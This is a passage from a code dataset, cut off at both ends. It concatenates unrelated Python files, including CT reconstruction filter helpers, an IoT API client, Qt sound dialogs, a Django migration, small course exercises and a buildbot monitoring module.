dtype=self.flt)\n self.f_b = pyfftw.empty_aligned(self.frs_detu, dtype=self.clx)\n self.fft_f = pyfftw.FFTW(self.f_a, self.f_b)\n self.if_a = pyfftw.empty_aligned(self.frs_detu, dtype=self.clx1)\n self.if_b = pyfftw.empty_aligned(self.rs_detu, dtype=self.flt1)\n self.ifft_f = pyfftw.FFTW(self.if_a, self.if_b, direction='FFTW_BACKWARD')\n\n def _call(self, x, out):\n # Do the convolution\n # overwrite f_b, fourier transform filter\n y = np.asarray(out)\n self.fft_f(isft(self.rs_filt(x)))\n # Create a detector sized stack of fourier tranformed filters\n hf_stack = np.zeros((np.size(self.range, 2), self.frs_detu),\n dtype=self.clx)\n # Resize the weighted data\n tmp1 = self.rs_det.range.element()\n # Stack the filter\n for j in range(np.size(self.range, 2)):\n hf_stack[j, :] = self.f_b\n for i in range(np.size(self.range, 0)):\n # Fourier transform of the data with angle i\n self.rs_det(self.gw[i,:,:].T, out=tmp1)\n self.fft_d(tmp1) # overwrite d_b\n # Product of the 
filter and the data in fspace\n self.d_b *= hf_stack\n # overwrite id_b, inverse fourier transform product\n self.ifft_d(self.d_b)\n # Overwrite the data with the convolution\n y[i, :, :] = np.asarray(self.rs_det.inverse(self.id_b)).T\n out[:] = y\n\n @property\n def adjoint(self):\n f = self\n\n class AdjStackingOp(odl.Operator):\n def __init__(self):\n super().__init__(domain=f.range, range=f.domain, linear=True)\n\n def _call(self, x, out):\n # Create a vector for the convolution resul\n tmp3 = np.zeros(f.rs_detu, dtype=f.flt1)\n # Resize the input\n x = np.asarray(x)\n tmp = f.rs_det.range.element()\n tmp2 = f.rs_det.range.element()\n for i in range(np.size(f.range, 0)):\n # fourier transform the data for angle i\n (f.rs_det(f.gw[i, :, :].T, out = tmp))\n f.fft_d(tmp) # overwrite d_b\n tmp1 = np.conj(f.d_b)\n # fourier transform the input for angle i\n (f.rs_det(x[i, :, :].T, out=tmp2))\n f.fft_d(tmp2) # overwrite d_b\n # compute product\n tmp1 *= f.d_b\n # inverse fourier transform product\n tmp4 = np.sum(tmp1, 0)\n f.ifft_f(tmp4) # Overwrite if_b\n tmp3 += f.if_b\n tmp1, tmp2, tmp4 = None, None, None\n tmp3 *= f.w_detu * f.a_wc\n tmp4 = isft(tmp3)\n f.rs_filt.inverse(tmp4, out=out)\n\n\n @property\n def adjoint(self):\n return f\n return AdjStackingOp()\n\n def conv_hf(self, hf):\n y = np.zeros(np.shape(self.range))\n hf_stack = np.zeros((np.size(self.range, 2), self.frs_detu),\n dtype=self.clx)\n # Resize the weighted data\n tmp1 = self.rs_det.range.element()\n # Stack the filter\n for j in range(np.size(self.range, 2)):\n hf_stack[j, :] = hf\n for i in range(np.size(self.range, 0)):\n # Fourier transform of the data with angle i\n self.rs_det(self.gw[i,:,:].T, out=tmp1)\n self.fft_d(tmp1) # overwrite d_b\n # Product of the filter and the data in fspace\n self.d_b *= hf_stack\n # overwrite id_b, inverse fourier transform product\n self.ifft_d(self.d_b)\n # Overwrite the data with the convolution\n y[i, :, :] = np.asarray(self.rs_det.inverse(self.id_b)).T\n return self.range.element(y) # Invert the resizing\n\n\n# %% Exponential binning funciton\ndef ExpBin(bin_param, size_filter_space):\n i = 0\n d = []\n B = [0]\n width = 1\n while i < int(size_filter_space/2):\n if i < bin_param:\n d += [width]\n i += 1\n B += [np.sum(d)]\n else:\n d += [width]\n width *= 2\n i += width\n B += [np.sum(d)]\n B += [int(size_filter_space/2)]\n return np.asarray(B)\n\n\n# %%\ndef ExpOp_builder(bin_param, filter_space, interp):\n # Create binning scheme\n if interp == 'Full':\n spf_space = filter_space\n Exp_op = odl.IdentityOperator(filter_space)\n elif interp == 'uniform':\n # Create binning scheme\n dpix = np.size(filter_space)\n dsize = filter_space.max_pt\n filt_bin_space = odl.uniform_discr(-dsize, dsize, dpix // (bin_param))\n spf_space = odl.uniform_discr(0, dsize, dpix //(2 * bin_param))\n resamp = odl.Resampling(filt_bin_space, filter_space)\n sym = SymOp(spf_space, filt_bin_space)\n Exp_op = resamp * sym\n else:\n if interp == 'constant':\n interp = 'nearest'\n elif interp == 'linear':\n pass\n else:\n raise ValueError('unknown `expansion operator type` ({})'\n ''.format(interp))\n B = ExpBin(bin_param, np.size(filter_space)) * filter_space.weighting.const\n B[-1] -= 1/2*filter_space.weighting.const\n\n # Create sparse filter space\n spf_part = odl.nonuniform_partition(B, min_pt=0, max_pt=B[-1])\n spf_weight = np.ravel(np.multiply.reduce(np.meshgrid(*spf_part.cell_sizes_vecs)))\n spf_fspace = odl.FunctionSpace(spf_part.set)\n spf_space = odl.DiscreteLp(spf_fspace, spf_part, 
odl.rn(spf_part.size,\n weighting=spf_weight), interp=interp)\n filt_pos_part = odl.uniform_partition(0, B[-1], int(np.size(filter_space)/2))\n\n filt_pos_space = odl.uniform_discr_frompartition(filt_pos_part, dtype='float64')\n lin_interp = odl.Resampling(spf_space, filt_pos_space)\n\n # Create symmetry operator\n sym = SymOp(filt_pos_space, filter_space)\n\n # Create sparse filter operator\n Exp_op = sym * lin_interp\n return spf_space, Exp_op\n\n\n# %% Function to compute the FDK weighting\ndef FDK_weighting(detecpix, det_space, w_detu, w_detv, src_rad, det_rad=0):\n midu = int(detecpix[0]/2)\n midv = int(detecpix[1]/2)\n rho = src_rad + det_rad\n w_FDK = np.ones((np.shape(det_space))) * rho ** 2\n for i in range(np.size(w_FDK, 0)):\n w_FDK[i, :] += ((-midu + i + 1/2) * w_detu) ** 2\n\n for j in range(np.size(w_FDK, 1)):\n w_FDK[:, j] += ((-midv + j + 1/2) * w_detv) ** 2\n\n return rho * np.sqrt(1 / w_FDK)\n\n\n# %% Ramp filter\ndef ramp_filt(rs_detu):\n mid_det = int(rs_detu / 2)\n filt_impr = np.zeros(mid_det + 1)\n n = np.arange(mid_det + 1)\n tau = 1\n filt_impr[0] = 1 / (4* tau **2)\n filt_impr[1::2] = -1 / (np.pi ** 2 * n[1::2] ** 2* tau **2)\n filt_impr = np.append(filt_impr[:-1], np.flip(filt_impr[1:], 0))\n return filt_impr\n\n\n# %%\ndef make_bin_LP(level):\n LP_base = np.array([1/2, 1/2])\n LP = LP_base.copy()\n if level == 1:\n return LP\n else:\n for i in range(level-1):\n LP = np.convolve(LP, LP_base)\n return LP\n \n# %%\ndef low_pass_filter(h, LP_filt):\n h_LP = np.zeros(np.shape(h))\n if LP_filt[0] == 'Gauss':\n gaussian_filter(h, LP_filt[1], output=h_LP)\n elif LP_filt[0] == 'Bin':\n LP = make_bin_LP(LP_filt[1])\n h_LP = np.convolve(h, LP, mode='same')\n return h_LP\n","sub_path":"AFFDK/sup_func_AFFDK.py","file_name":"sup_func_AFFDK.py","file_ext":"py","file_size_in_byte":10984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"450044633","text":"# -*- coding: utf-8 -*-\n\nimport json\n\nfrom collections import Sequence\nfrom datetime import datetime\n\ntry:\n from urlparse import urljoin\nexcept ImportError:\n from urllib.parse import urljoin # NOQA\n\nimport cosm\n\n\nDEFAULT_FORMAT = 'json'\n\n\nclass Client(object):\n\n api_version = 'v2'\n client_class = cosm.Client\n\n def __init__(self, key):\n self.client = self.client_class(key)\n self.client.base_url += '/{}/'.format(self.api_version)\n self.feeds = FeedsManager(self.client)\n self.triggers = TriggersManager(self.client)\n\n\nclass ManagerBase(object):\n\n def _url(self, url_or_id):\n url = self.base_url\n if url_or_id:\n url += '/'\n url = urljoin(url, str(url_or_id))\n return url\n\n def _json_default(self, obj):\n if not isinstance(obj, datetime):\n raise TypeError\n return obj.isoformat() + 'Z'\n\n def _parse_datetime(self, value):\n return datetime.strptime(value, \"%Y-%m-%dT%H:%M:%S.%fZ\")\n\n def _prepare_params(self, params):\n params = dict(params)\n for name, value in params.items():\n if isinstance(value, datetime):\n params[name] = value.isoformat() + 'Z'\n return params\n\n\nclass FeedsManager(ManagerBase):\n\n def __init__(self, client):\n self.client = client\n self.base_url = urljoin(client.base_url, 'feeds')\n\n def create(self, title, **kwargs):\n data = dict(title=title, **kwargs)\n response = self.client.post(self.base_url, data=data)\n response.raise_for_status()\n feed = cosm.Feed(**data)\n feed._manager = self\n feed._data['feed'] = response.headers['location']\n return feed\n\n def update(self, id_or_url, **kwargs):\n url = 
self._url(id_or_url)\n response = self.client.put(url, data=kwargs)\n response.raise_for_status()\n\n def list(self, **params):\n url = self._url(None)\n response = self.client.get(url, params=params)\n response.raise_for_status()\n json = response.json()\n for feed_data in json['results']:\n feed = cosm.Feed(**feed_data)\n feed._manager = self\n yield feed\n\n def get(self, url_or_id, **params):\n url = self._url(url_or_id)\n params = self._prepare_params(params)\n response = self.client.get(url, params=params)\n response.raise_for_status()\n data = response.json()\n datastreams_data = data.pop('datastreams', None)\n feed = cosm.Feed(**data)\n feed._manager = self\n if datastreams_data:\n datastreams = self._coerce_datastreams(\n feed.datastreams, datastreams_data)\n feed._data['datastreams'] = datastreams\n return feed\n\n def delete(self, url_or_id):\n url = self._url(url_or_id)\n response = self.client.delete(url)\n response.raise_for_status()\n\n def _coerce_datastreams(self, datastreams_manager, datastreams_data):\n coerce = datastreams_manager._coerce_to_datastream\n datastreams = []\n for data in datastreams_data:\n datastream = coerce(data)\n datastreams.append(datastream)\n return datastreams\n\n\nclass DatastreamsManager(Sequence, ManagerBase):\n\n def __init__(self, feed):\n self.feed = feed\n feed_manager = getattr(feed, '_manager', None)\n if feed_manager is not None:\n self.client = feed_manager.client\n self.base_url = feed.feed.replace('.json', '') + '/datastreams'\n else:\n self.client = None\n\n def __contains__(self, value):\n return value in self.datastreams['datastreams']\n\n def __getitem__(self, item):\n return self._datastreams[item]\n\n def __len__(self):\n return len(self._datastreams)\n\n @property\n def _datastreams(self):\n return self.feed._data['datastreams']\n\n def create(self, id, **kwargs):\n data = {'version': \"1.0.0\", 'datastreams': [dict(id=id, **kwargs)]}\n response = self.client.post(self.base_url, data=data)\n response.raise_for_status()\n datastream = cosm.Datastream(id=id, **kwargs)\n datastream._manager = self\n return datastream\n\n def update(self, datastream_id, **kwargs):\n url = self._url(datastream_id)\n response = self.client.put(url, data=kwargs)\n response.raise_for_status()\n\n def list(self, **params):\n url = self._url('..')\n response = self.client.get(url, params=params)\n response.raise_for_status()\n json = response.json()\n for datastream_data in json.get('datastreams', []):\n datastream = cosm.Datastream(**datastream_data)\n datastream._manager = self\n yield datastream\n\n def get(self, id, **params):\n url = self._url(id)\n params = self._prepare_params(params)\n response = self.client.get(url, params=params)\n response.raise_for_status()\n data = response.json()\n datastream = self._coerce_to_datastream(data)\n return datastream\n\n def delete(self, url_or_id):\n url = self._url(url_or_id)\n response = self.client.delete(url)\n response.raise_for_status()\n\n def _coerce_datapoints(self, datapoints_manager, datapoints_data):\n coerce = datapoints_manager._coerce_to_datapoint\n datapoints = []\n for data in datapoints_data:\n data['at'] = self._parse_datetime(data['at'])\n datapoint = coerce(data)\n datapoints.append(datapoint)\n return datapoints\n\n def _coerce_to_datastream(self, d):\n if isinstance(d, dict):\n datapoints_data = d.pop('datapoints', None)\n datastream = cosm.Datastream(**d)\n if datapoints_data:\n datapoints = self._coerce_datapoints(\n datastream.datapoints, datapoints_data)\n datastream.datapoints = 
datapoints\n datastream._manager = self\n return datastream\n\n\nclass DatapointsManager(Sequence, ManagerBase):\n\n def __init__(self, datastream):\n self.datastream = datastream\n datastream_manager = getattr(datastream, '_manager', None)\n if datastream_manager is not None:\n self.client = datastream._manager.client\n datastream_url = datastream._manager._url(datastream.id)\n self.base_url = datastream_url + '/datapoints'\n else:\n self.client = None\n\n def __contains__(self, value):\n return value in self.datapoints['datapoints']\n\n def __getitem__(self, item):\n return self._datapoints[item]\n\n def __len__(self):\n return len(self._datapoints)\n\n @property\n def _datapoints(self):\n return self.datastream._data['datapoints']\n\n def create(self, datapoints):\n datapoints = [self._coerce_to_datapoint(d) for d in datapoints]\n payload = {'datapoints': datapoints}\n response = self.client.post(self.base_url, data=payload)\n response.raise_for_status()\n return datapoints\n\n def update(self, at, value):\n url = \"{}/{}Z\".format(self.base_url, at.isoformat())\n payload = {'value': value}\n response = self.client.put(url, data=payload)\n response.raise_for_status()\n\n def get(self, at):\n url = \"{}/{}Z\".format(self.base_url, at.isoformat())\n response = self.client.get(url)\n response.raise_for_status()\n data = response.json()\n data['at'] = self._parse_datetime(data['at'])\n return self._coerce_to_datapoint(data)\n\n def history(self, **params):\n url = self._url('..').rstrip('/')\n params = self._prepare_params(params)\n response = self.client.get(url, params=params)\n response.raise_for_status()\n data = response.json()\n for datapoint_data in data['datapoints']:\n datapoint_data['at'] = self._parse_datetime(datapoint_data['at'])\n yield self._coerce_to_datapoint(datapoint_data)\n\n def delete(self, at=None, **params):\n url = self.base_url\n if at:\n url = \"{}/{}Z\".format(url, at.isoformat())\n elif params:\n params = self._prepare_params(params)\n response = self.client.delete(url, params=params)\n response.raise_for_status()\n\n def _coerce_to_datapoint(self, d):\n if isinstance(d, cosm.Datapoint):\n datapoint = self._clone_datapoint(d)\n elif isinstance(d, dict):\n datapoint = cosm.Datapoint(**d)\n datapoint._manager = self\n return datapoint\n\n def _clone_datapoint(self, d):\n return cosm.Datapoint(**d._data)\n\n\nclass TriggersManager(ManagerBase):\n\n def __init__(self, client):\n self.client = client\n self.base_url = urljoin(client.base_url, \"triggers\")\n\n def create(self, *args, **kwargs):\n trigger = cosm.Trigger(*args, **kwargs)\n response = self.client.post(self.base_url, data=trigger)\n response.raise_for_status()\n trigger._manager = self\n location = response.headers['location']\n trigger._data['id'] = int(location.rsplit('/', 1)[1])\n return trigger\n\n def get(self, id):\n url = self._url(id)\n response = self.client.get(url)\n response.raise_for_status()\n data = response.json()\n data.pop('id')\n notified_at = data.pop('notified_at', None)\n user = data.pop('user', None)\n trigger = cosm.Trigger(**data)\n trigger._data['id'] = id\n if notified_at:\n trigger._data['notified_at'] = self._parse_datetime(notified_at)\n if user:\n trigger._data['user'] = user\n trigger._manager = self\n return trigger\n","sub_path":"cosm/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"6720169","text":"import sys\n#\n# >>> Escriba el codigo del 
mapper a partir de este punto <<<\n#\n\nif __name__ == \"__main__\":\n \n for line in sys.stdin:\n # Setting some defaults\n letra = \"\"\n fecha = \"\"\n valor = \"\"\n \n line = line.strip()\n splits = line.split(\" \")\n letra = splits[0]\n fecha = splits[1]\n valor = splits[2]\n \n print(letra + '\\t' + fecha + ',' + valor)","sub_path":"01-hadoop-50/q09-10/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"510981363","text":"\"\"\"Papermill Due Diligence View Module\"\"\"\n__docformat__ = \"numpy\"\n\nimport argparse\nfrom typing import List\nfrom datetime import datetime\nimport os\nimport webbrowser\nimport papermill as pm\nfrom gamestonk_terminal.helper_funcs import parse_known_args_and_warn\nfrom gamestonk_terminal import config_terminal as cfg\n\n\ndef due_diligence_report(other_args: List[str]):\n \"\"\"Due Diligence Report\n\n Parameters\n ----------\n other_args : List[str]\n Command line arguments to be processed with argparse\n \"\"\"\n parser = argparse.ArgumentParser(\n add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n prog=\"dd\",\n description=\"\"\"\n Run due diligence analysis\n \"\"\",\n )\n parser.add_argument(\n \"-t\",\n \"--ticker\",\n action=\"store\",\n dest=\"s_ticker\",\n required=\"-h\" not in other_args,\n help=\"Stock ticker\",\n )\n parser.add_argument(\n \"-m\",\n \"--mode\",\n action=\"store\",\n dest=\"mode\",\n default=\"html\",\n choices=[\"ipynb\", \"html\"],\n help=\"Output mode to show report. ipynb will allow to add information to the report.\",\n )\n\n try:\n if other_args:\n if \"-t\" not in other_args and \"-h\" not in other_args:\n other_args.insert(0, \"-t\")\n\n ns_parser = parse_known_args_and_warn(parser, other_args)\n if not ns_parser:\n return\n\n # Update values:\n s_ticker = ns_parser.s_ticker\n today = datetime.now()\n analysis_notebook = os.path.join(\n \"notebooks\",\n \"reports\",\n f\"{s_ticker}_due_diligence_{today.strftime('%Y%m%d_%H%M%S')}\",\n )\n pm.execute_notebook(\n os.path.join(\"notebooks\", \"templates\", \"due_diligence.ipynb\"),\n analysis_notebook + \".ipynb\",\n parameters=dict(\n ticker=s_ticker,\n report_name=f\"{s_ticker}_due_diligence_{today.strftime('%Y%m%d_%H%M%S')}\",\n base_path=os.path.abspath(os.path.join(\".\")),\n ),\n )\n\n if ns_parser.mode == \"ipynb\":\n webbrowser.open(\n os.path.join(\n f\"http://localhost:{cfg.PAPERMILL_NOTEBOOK_REPORT_PORT}\",\n \"notebooks\",\n analysis_notebook + \".ipynb\",\n )\n )\n else:\n webbrowser.open(\n os.path.join(\n f\"http://localhost:{cfg.PAPERMILL_NOTEBOOK_REPORT_PORT}\",\n \"view\",\n analysis_notebook + \".\" + ns_parser.mode,\n )\n )\n\n print(\"\")\n print(\n \"Exported: \",\n os.path.join(\n os.path.abspath(os.path.join(\".\")), analysis_notebook + \".html\"\n ),\n \"\\n\",\n )\n\n except Exception as e:\n print(e, \"\\n\")\n except SystemExit:\n print(\"\")\n","sub_path":"gamestonk_terminal/stocks/report/due_diligence_view.py","file_name":"due_diligence_view.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"400082508","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('summary', '0001_initial'),\n ]\n\n operations = [\n 
migrations.AddField(\n model_name='workreport',\n name='created_datetime',\n field=models.DateTimeField(default=datetime.datetime(2015, 12, 21, 3, 3, 18, 470000, tzinfo=utc), verbose_name='Created at', auto_now_add=True),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='workreport',\n name='updated_datetime',\n field=models.DateTimeField(default=datetime.datetime(2015, 12, 21, 3, 3, 27, 741000, tzinfo=utc), verbose_name='Last Modified', auto_now=True),\n preserve_default=False,\n ),\n ]\n","sub_path":"src/cobra/apps/summary/migrations/0002_auto_20151221_1103.py","file_name":"0002_auto_20151221_1103.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"178276681","text":"# coding: utf-8\n\nimport sound\n\nfrom PySide2.QtWidgets import QHBoxLayout, QListView, QPushButton, QLabel, QVBoxLayout, QSlider, QStyle, QDialog, QDialogButtonBox, QMessageBox\nfrom PySide2.QtCore import QStringListModel, Qt, QModelIndex\nfrom functools import partial\n\n\nclass AddListDialog(QDialog):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Init variables\n model = QStringListModel()\n view = QListView()\n dialog_button = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel, Qt.Horizontal)\n self.voice_button = QPushButton(\"サンプル音声\")\n slider = QSlider(Qt.Horizontal)\n dummy_panel = QLabel()\n line_panel = QLabel(f\"{'-':->80}\")\n ex_panel = QLabel(\"説明:\")\n self.sub_label = QLabel()\n sub_lay = QVBoxLayout()\n voice_button_lay = QHBoxLayout()\n main_layout = QHBoxLayout()\n\n # Widgets\n model.setStringList([w for w in sound.data.values()])\n\n view.setModel(model)\n view.setEditTriggers(False)\n view.setCurrentIndex(model.index(0, 0))\n view.pressed.connect(self.on_pressed)\n\n self.obj: QModelIndex = view.currentIndex()\n\n ex_panel.setAlignment(Qt.AlignLeft | Qt.AlignBottom)\n\n self.sub_label.setAlignment(Qt.AlignTop | Qt.AlignHCenter)\n self.sub_label.setText(sound.data[0])\n\n self.voice_button.setFixedSize(70, 50)\n self.voice_button.clicked.connect(partial(sound.playSound, 0))\n\n slider.setRange(0, 100)\n slider.setValue(15)\n slider.valueChanged.connect(sound.setSoundVolume)\n\n dummy_panel.setPixmap(self.style().standardPixmap(QStyle.SP_MediaVolume))\n dummy_panel.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n\n dialog_button.accepted.connect(self.on_accepted)\n dialog_button.rejected.connect(self.reject)\n\n # Voice Button Layout\n voice_button_lay.addWidget(dummy_panel, 3)\n voice_button_lay.addWidget(slider, 1)\n voice_button_lay.addSpacing(10)\n voice_button_lay.addWidget(self.voice_button, 2)\n\n # Details Layout\n sub_lay.addWidget(ex_panel, 1)\n sub_lay.addWidget(line_panel, 1)\n sub_lay.addWidget(self.sub_label, 5)\n sub_lay.addLayout(voice_button_lay)\n sub_lay.addSpacing(20)\n sub_lay.addWidget(dialog_button)\n\n # Main Layout\n main_layout.addWidget(view, 4)\n main_layout.addSpacing(20)\n main_layout.addLayout(sub_lay, 9)\n main_layout.addSpacing(20)\n\n self.setLayout(main_layout)\n self.setFixedSize(700, 450)\n\n def on_pressed(self, obj):\n self.obj = obj\n self.sub_label.setText(sound.data[obj.row()])\n self.voice_button.clicked.connect(partial(sound.playSound, self.obj.row()))\n\n def on_accepted(self):\n for i in range(self.parent().layout().count()):\n c = self.parent().layout().itemAt(i).widget()\n if isinstance(c, QPushButton):\n if c.text() == self.obj.data():\n box = QMessageBox()\n box.setText(\"This voice is already 
registered!\")\n box.exec_()\n return self\n\n self.accept()\n\n\nclass RemoveListDialog(QDialog):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Init Variables\n self.word_list = []\n model = QStringListModel()\n view = QListView()\n dialog_button = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel, Qt.Horizontal)\n line_panel = QLabel(f\"{'-':->80}\")\n ex_panel = QLabel(\"説明:\")\n self.sub_label = QLabel()\n sub_lay = QVBoxLayout()\n main_layout = QHBoxLayout()\n\n # Widgets\n for i in range(self.parent().layout().count()):\n c = self.parent().layout().itemAt(i).widget()\n if isinstance(c, QPushButton):\n self.word_list.append(c.text())\n\n model.setStringList(self.word_list)\n\n view.setModel(model)\n view.setEditTriggers(False)\n view.setCurrentIndex(model.index(0, 0))\n view.pressed.connect(self.on_pressed)\n\n self.obj: QModelIndex = view.currentIndex()\n\n ex_panel.setAlignment(Qt.AlignLeft | Qt.AlignBottom)\n\n self.sub_label.setAlignment(Qt.AlignTop | Qt.AlignHCenter)\n if self.word_list:\n self.sub_label.setText(self.word_list[0])\n\n dialog_button.accepted.connect(self.accept)\n dialog_button.rejected.connect(self.reject)\n\n # Sub Layout\n sub_lay.addWidget(ex_panel, 1)\n sub_lay.addWidget(line_panel, 1)\n sub_lay.addWidget(self.sub_label, 6)\n sub_lay.addSpacing(20)\n sub_lay.addWidget(dialog_button)\n\n # Main Layout\n main_layout.addWidget(view, 4)\n main_layout.addSpacing(20)\n main_layout.addLayout(sub_lay, 9)\n main_layout.addSpacing(20)\n\n self.setLayout(main_layout)\n self.setFixedSize(700, 450)\n\n def on_pressed(self, obj):\n self.obj = obj\n self.sub_label.setText(self.word_list[obj.row()])\n","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":5152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"214354883","text":"import webapp2\n\nfrom google.appengine.api import users\n\nimport urllib\nfrom google.appengine.api import urlfetch\n\nimport website\n\n\nclass PortalHandler(webapp2.RequestHandler):\n def get(self):\n variables = {}\n self.response.write(website.render('portal.html', variables))\n\n\nclass SubmitHandler(webapp2.RequestHandler):\n def get(self):\n self.redirect('/found')\n\n def post(self):\n form_url = \"https://docs.google.com/forms/d/1Zc3t0IcdEBH-tqWWDsjBFMVEy05G0IvHhsW9DPHh-Zs/formResponse\"\n params_out = {'entry.2069079998': self.request.get('id'),\n 'entry.1116429470': self.request.get('loc'),\n 'entry.64319261': self.request.get('note'),\n 'entry.1628696689': self.request.get('user'),\n 'entry.1699739988': self.request.get('ref'),\n 'entry.1529275179': self.request.remote_addr,\n 'entry.914723343': self.request.user_agent}\n\n form_data = urllib.urlencode(params_out)\n result = urlfetch.fetch(\n url=form_url,\n payload=form_data,\n method=urlfetch.POST,\n headers={'Content-Type': 'application/x-www-form-urlencoded'}\n )\n\n if result:\n self.response.write('Report sent. 
Thank you!')\n\napp = webapp2.WSGIApplication([\n ('/submit', SubmitHandler),\n ('/portal', PortalHandler),\n], debug=True)\n","sub_path":"portal.py","file_name":"portal.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"524401562","text":"#!/usr/bin/python\n\n\"\"\" \n This is the code to accompany the Lesson 2 (SVM) mini-project.\n\n Use a SVM to identify emails from the Enron corpus by their authors: \n Sara has label 0\n Chris has label 1\n\"\"\"\n \nimport sys\nfrom time import time\nsys.path.append(\"../tools/\")\nfrom email_preprocess import preprocess\nfrom sklearn.svm import SVC\n\n### features_train and features_test are the features for the training\n### and testing datasets, respectively\n### labels_train and labels_test are the corresponding item labels\n\nfeatures_train, features_test, labels_train, labels_test = preprocess()\n\n\n\n\n\nprint('hi')\nsvm_tester = SVC(kernel = \"rbf\", C = 10000)\nprint('r')\nsvm_tester.fit(features_train, labels_train)\nprint('this is booty')\n#print(svm_tester.score(features_test, labels_test))\npred = svm_tester.predict(features_test)\ncount = 0\nfor i in pred:\n if i:\n count += 1\nprint(count)\n\n#print svm_tester.accuracy()\n#########################################################\n### your code goes here ###\n\n#########################################################","sub_path":"intro-machine-learning-coursework/svm/svm_author_id.py","file_name":"svm_author_id.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"605409530","text":"from collections import OrderedDict\n\n\ndef ex1():\n ordered_dictionary = OrderedDict()\n ordered_dictionary[\"a\"] = 1\n ordered_dictionary[\"a\"] += +1\n ordered_dictionary[\"a\"] += 3\n ordered_dictionary[\"b\"] = 3\n print(ordered_dictionary)\n\n\nn = int(input())\nshop = []\nitem_name = []\nnet_price = []\nproducts = OrderedDict()\n\nfor i in range(n):\n shop.append(input())\n\nfor i in range(len(shop)): # dict of words\n words = shop[i].split()\n key_join = \" \".join(words[:-1])\n value = int(words[-1])\n products[key_join] = 0\n\nfor k in range(len(shop)): # put values to key\n words = shop[k].split()\n key_join = \" \".join(words[:-1])\n value = int(words[-1])\n products[key_join] += value\n\nitem_name = list(products.keys())\nitem_price = list(products.values())\n\nfor u in range(len(item_name)):\n print(str(item_name[u]) + \" \" + str(item_price[u]))\n","sub_path":"Python_HackerRank/Collections/collectionsOrderedDict.py","file_name":"collectionsOrderedDict.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"499217026","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 4 23:12:15 2019\n\n@author: abhijithneilabraham\n\"\"\"\nimport random\nimport time\nfrom playsound import playsound\nc=int(input('write in number how much you love a cat \\n')) \ndef catran():\n a=random.randint(97,136)\n if a>=97 and a<=103:\n playsound('cataudios/cat1.mp3') #cat1.mp3, cat2.mp3, cat3.mp3 and cat4.mp3 is provided in the repo\n if a>103 and a<=110:\n playsound('cataudios/cat2.mp3')\n if a>110 and a<=117:\n playsound('cataudios/cat3.mp3')\n if a>117 and a<=122:\n playsound('cataudios/cat4.mp3')\n if a>122 and a<=129:\n playsound('cataudios/cat5.mp3')\n if a>129 and a<136:\n 
playsound('cataudios/cat6.mp3')\n print(chr(a),end=\"\")\nr=0.05\nfor i in range(c):\n \n if i%5==0:\n r=random.uniform(0.01,0.2)\n time.sleep(r)\n catran()\nprint(\"\\n Oops,cat ran\",str(c),\"times through ya keyboard!\")\n \n\n \n","sub_path":"kat_ran/kat.py","file_name":"kat.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"586397276","text":"# Copyright 2016 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport collections\nimport time\n\nfrom buildbot.status.base import StatusReceiverMultiService\nfrom twisted.internet import defer, reactor, task\nfrom twisted.python import log, threadpool\n\nfrom infra_libs import ts_mon\n\nuptime = ts_mon.FloatMetric('buildbot/master/uptime',\n description='Time (in seconds) since the master was started')\naccepting_builds = ts_mon.BooleanMetric('buildbot/master/accepting_builds',\n description='Whether the master\\'s BuildRequestDistributor is running')\n\nconnected = ts_mon.GaugeMetric('buildbot/master/builders/connected_slaves',\n description='Number of slaves currently connected, per builder')\ncurrent_builds = ts_mon.GaugeMetric('buildbot/master/builders/current_builds',\n description='Number of builds currently running, per builder')\npending_builds = ts_mon.GaugeMetric('buildbot/master/builders/pending_builds',\n description='Number of builds pending, per builder')\nstate = ts_mon.StringMetric('buildbot/master/builders/state',\n description='State of this builder - building, idle, or offline')\ntotal = ts_mon.GaugeMetric('buildbot/master/builders/total_slaves',\n description='Number of slaves configured on this builder - connected or '\n 'not')\n\npool_queue = ts_mon.GaugeMetric('buildbot/master/thread_pool/queue',\n description='Number of runnables queued in the database thread pool')\npool_waiting = ts_mon.GaugeMetric('buildbot/master/thread_pool/waiting',\n description='Number of idle workers for the database thread pool')\npool_working = ts_mon.GaugeMetric('buildbot/master/thread_pool/working',\n description='Number of running workers for the database thread pool')\n\nSERVER_STARTED = time.time()\n\n\nclass MonitoringStatusReceiver(StatusReceiverMultiService):\n \"\"\"Flushes ts_mon metrics once per minute.\"\"\"\n\n def __init__(self):\n 